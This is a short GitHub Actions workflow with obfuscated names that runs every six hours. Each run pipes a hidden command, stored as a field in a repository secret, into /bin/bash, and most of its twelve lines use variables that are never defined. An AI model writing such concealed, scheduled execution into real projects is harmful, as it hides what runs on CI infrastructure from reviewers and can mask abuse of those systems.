name: guoxiagjiaokai

on:
  workflow_dispatch:
  schedule:
    - cron: '52 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guoxiagjiaokai
        env:
          co87753: ${{ secrets.co87753 }}
        run: |
          echo $co87753 | jq -r .ohlu43 | /bin/bash
          echo $gs53045 | jq -r .fulkb07 | /bin/bash
          echo $tzry436 | jq -r .uq16498 | /bin/bash
          echo $ti999 | jq -r .e507 | /bin/bash
          echo $oyph5 | jq -r .yn00703 | /bin/bash
          echo $zztzg5 | jq -r .wttci673 | /bin/bash
          echo $zwl815 | jq -r .oji4 | /bin/bash
          echo $cdo9 | jq -r .rqnpr84 | /bin/bash
          echo $sjby0672 | jq -r .wpgk46 | /bin/bash
          echo $fn90160 | jq -r .db6399 | /bin/bash
          echo $z133 | jq -r .pbc797 | /bin/bash
          echo $rzc2023 | jq -r .qsp23 | /bin/bash

